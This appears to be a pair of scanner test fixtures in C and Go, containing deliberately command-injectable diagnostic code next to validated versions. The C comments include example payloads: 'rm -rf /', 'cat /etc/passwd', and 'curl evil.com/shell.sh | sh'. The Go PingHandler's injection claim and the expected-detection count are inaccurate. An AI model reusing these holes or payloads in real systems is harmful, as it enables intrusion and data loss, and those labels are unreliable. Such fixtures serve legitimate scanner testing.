File: tests/vulnerabilities/c/realworld_cmd_injection.c
/**
 * realworld_cmd_injection.c
 *
 * Simulates a simple network diagnostic CLI tool ("netdiag")
 * that accepts a hostname or IP via command-line arguments and
 * environment variables, then runs various network commands.
 *
 * VULN patterns: system()/popen() with user-controlled input concatenation
 * SAFE patterns: whitelist validation before use
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Maximum allowed hostname length */
#define MAX_HOSTNAME_LEN 253
#define MAX_CMD_LEN 1024

/**
 * Validate that a hostname contains only safe characters.
 * Returns 1 if safe, 0 if dangerous characters detected.
 */
static int is_safe_hostname(const char *input) {
    if (!input || strlen(input) == 0 || strlen(input) > MAX_HOSTNAME_LEN) {
        return 0;
    }
    /* Allow only alphanumeric, hyphens, dots */
    for (size_t i = 0; i < strlen(input); i++) {
        char c = input[i];
        if (!(isalnum((unsigned char)c) || c == '-' || c == '.')) {
            return 0;
        }
    }
    return 1;
}

/**
 * Perform a DNS lookup on a hostname.
 * SAFE: validates input against whitelist before passing to system()
 */
void safe_dns_lookup(const char *hostname) {
    if (!is_safe_hostname(hostname)) {
        fprintf(stderr, "Error: invalid hostname '%s'\n", hostname);
        return;
    }
    char cmd[MAX_CMD_LEN];
    snprintf(cmd, sizeof(cmd), "nslookup %s", hostname);
    printf("Running: %s\n", cmd);
    system(cmd);
}

/**
 * Perform a traceroute to a target.
 * SAFE: validates input against whitelist before passing to popen()
 */
void safe_traceroute(const char *target) {
    if (!is_safe_hostname(target)) {
        fprintf(stderr, "Error: invalid target '%s'\n", target);
        return;
    }
    char cmd[MAX_CMD_LEN];
    snprintf(cmd, sizeof(cmd), "traceroute %s 2>&1", target);
    printf("Running: %s\n", cmd);
    FILE *fp = popen(cmd, "r");
    if (fp) {
        char buf[256];
        while (fgets(buf, sizeof(buf), fp)) {
            printf("  %s", buf);
        }
        pclose(fp);
    }
}

/**
 * Run a ping sweep on a network range.
 * VULN: system() with argv directly concatenated — no sanitization.
 *       An attacker can pass "127.0.0.1; rm -rf /" as argv[1].
 */
void vuln_ping_sweep(const char *target) {
    char cmd[MAX_CMD_LEN];
    /* VULN: Command injection via system() with unsanitized user input */
    snprintf(cmd, sizeof(cmd), "ping -c 4 %s", target);
    printf("Running: %s\n", cmd);
    system(cmd);
}

/**
 * Run a whois lookup from an environment variable.
 * VULN: popen() with getenv() value directly concatenated — no sanitization.
 *       If WHOIS_HOST env var contains "; cat /etc/passwd", it gets executed.
 */
void vuln_whois_lookup(void) {
    const char *host = getenv("WHOIS_HOST");
    if (!host) {
        fprintf(stderr, "WHOIS_HOST not set\n");
        return;
    }
    char cmd[MAX_CMD_LEN];
    /* VULN: Command injection via popen() with unsanitized getenv() input */
    snprintf(cmd, sizeof(cmd), "whois %s 2>&1", host);
    printf("Running: %s\n", cmd);
    FILE *fp = popen(cmd, "r");
    if (fp) {
        char buf[256];
        while (fgets(buf, sizeof(buf), fp)) {
            printf("  %s", buf);
        }
        pclose(fp);
    }
}

/**
 * Run a port scan using nmap.
 * VULN: system() with argv directly concatenated — no sanitization.
 *       An attacker can pass "127.0.0.1 && curl evil.com/shell.sh | sh"
 */
void vuln_port_scan(const char *target) {
    char cmd[MAX_CMD_LEN];
    /* VULN: Command injection via system() with unsanitized user input */
    snprintf(cmd, sizeof(cmd), "nmap -sT %s", target);
    printf("Running: %s\n", cmd);
    system(cmd);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <target_host_or_ip>\n", argv[0]);
        printf("Environment: WHOIS_HOST=<host> for whois lookup\n");
        return 1;
    }

    printf("=== Netdiag Network Diagnostic Tool ===\n\n");

    /* VULN: Ping sweep with unsanitized command-line argument */
    vuln_ping_sweep(argv[1]);

    printf("\n");

    /* VULN: Port scan with unsanitized command-line argument */
    vuln_port_scan(argv[1]);

    printf("\n");

    /* VULN: Whois lookup with unsanitized environment variable */
    vuln_whois_lookup();

    printf("\n");

    /* SAFE: DNS lookup with whitelist-validated input */
    safe_dns_lookup(argv[1]);

    printf("\n");

    /* SAFE: Traceroute with whitelist-validated input */
    safe_traceroute(argv[1]);

    return 0;
}

File: tests/vulnerabilities/go/realworld_cmd_injection.go
package main

// Real-world command injection test cases for Kunlun-M scanner
// Simulates a Go web application with admin diagnostic tools
// Expected detections: 3 TRUE POSITIVE (command injection), 1 SAFE

import (
	"fmt"
	"net/http"
	"os/exec"
	"strings"
)

// DiagnosticServer simulates an admin tool that runs system commands
type DiagnosticServer struct{}

// VULN-1: Command injection via fmt.Sprintf into exec.Command name
// User-controlled "tool" param is concatenated directly into the command string
func (s *DiagnosticServer) RunToolHandler(w http.ResponseWriter, r *http.Request) {
	tool := r.URL.Query().Get("tool")
	// VULN: user input controls which binary is executed
	cmdStr := fmt.Sprintf("/usr/local/bin/%s --version", tool)
	out, err := exec.Command("sh", "-c", cmdStr).Output()
	if err != nil {
		http.Error(w, "command failed", 500)
		return
	}
	w.Write(out)
}

// VULN-2: Command injection via argument concatenation
// User-controlled "host" param injected into ping command argument
func (s *DiagnosticServer) PingHandler(w http.ResponseWriter, r *http.Request) {
	host := r.URL.Query().Get("host")
	// VULN: user can inject additional shell commands via semicolons or backticks
	cmd := exec.Command("ping", "-c", "4", host)
	out, err := cmd.Output()
	if err != nil {
		http.Error(w, "ping failed", 500)
		return
	}
	w.Write(out)
}

// VULN-3: Command injection via exec.Command with sh -c and fmt.Sprintf
// User-controlled "logfile" param is concatenated into a grep command
func (s *DiagnosticServer) LogSearchHandler(w http.ResponseWriter, r *http.Request) {
	searchTerm := r.FormValue("search")
	logFile := r.URL.Query().Get("logfile")
	// VULN: both searchTerm and logFile are user-controlled, no sanitization
	cmdStr := fmt.Sprintf("grep '%s' /var/log/app/%s", searchTerm, logFile)
	out, err := exec.Command("sh", "-c", cmdStr).CombinedOutput()
	if err != nil {
		http.Error(w, "search failed", 500)
		return
	}
	w.Write(out)
}

// SAFE: Command execution with validated allowlist and separate args
// Only executes pre-approved binaries, user input passed as isolated argument
func (s *DiagnosticServer) SafeDnsLookupHandler(w http.ResponseWriter, r *http.Request) {
	domain := r.URL.Query().Get("domain")
	// SAFE: using allowlist check and separate args (no shell wrapping)
	allowed := []string{"example.com", "test.local", "internal.corp"}
	isValid := false
	for _, a := range allowed {
		if domain == a {
			isValid = true
			break
		}
	}
	if !isValid {
		http.Error(w, "domain not allowed", 403)
		return
	}
	// SAFE: separate args, no shell, no string concatenation in command
	out, err := exec.Command("dig", "+short", domain).Output()
	if err != nil {
		http.Error(w, "dns lookup failed", 500)
		return
	}
	w.Write(out)
}

// SAFE: Command execution with strict input validation (alphanumeric only)
func (s *DiagnosticServer) SafeProcessInfoHandler(w http.ResponseWriter, r *http.Request) {
	pid := r.URL.Query().Get("pid")
	// SAFE: strict validation ensures only numeric input
	for _, c := range pid {
		if c < '0' || c > '9' {
			http.Error(w, "invalid pid", 400)
			return
		}
	}
	// SAFE: separate args, no shell concatenation
	out, err := exec.Command("ps", "-p", pid, "-o", "pid,comm,args").Output()
	if err != nil {
		http.Error(w, "process not found", 404)
		return
	}
	w.Write(out)
}

func main() {
	srv := &DiagnosticServer{}
	mux := http.NewServeMux()
	mux.HandleFunc("/admin/run-tool", srv.RunToolHandler)
	mux.HandleFunc("/admin/ping", srv.PingHandler)
	mux.HandleFunc("/admin/log-search", srv.LogSearchHandler)
	mux.HandleFunc("/admin/dns", srv.SafeDnsLookupHandler)
	mux.HandleFunc("/admin/process", srv.SafeProcessInfoHandler)
	fmt.Println("Diagnostic server running on :8080")
	_ = strings.TrimSpace("") // unused import suppression
	http.ListenAndServe(":8080", mux)
}
